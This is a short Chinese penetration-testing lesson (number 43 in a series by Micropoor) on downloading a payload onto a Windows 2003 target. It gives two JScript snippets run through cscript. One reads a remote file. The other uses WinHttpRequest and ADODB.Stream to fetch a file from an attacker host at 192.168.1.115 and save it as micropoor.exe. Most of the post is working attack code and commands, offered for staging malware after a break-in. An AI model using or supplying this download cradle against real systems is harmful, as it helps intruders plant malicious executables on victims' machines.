windows 全版本都会默认支持 js,并且通过cscript 来调用达到下载 payload 的目的。

靶机:windows 2003

读取:

  1. C:\test>cscript /nologo downfile.js http://192.168.1.115/robots.txt

第四十三课:js一句话下载payload - 图1

附代码:

  1. var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
  2. WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
  3. WinHttpReq.Send();
  4. WScript.Echo(WinHttpReq.ResponseText);

写入:

  1. C:\test>cscript /nologo dowfile2.js http://192.168.1.115/robots.txt

第四十三课:js一句话下载payload - 图2

附代码:

  1. var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
  2. WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
  3. WinHttpReq.Send();
  4. BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1;
  5. BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody);
  6. BinStream.SaveToFile("micropoor.exe");

后者的话:简单,易用,轻便。

Micropoor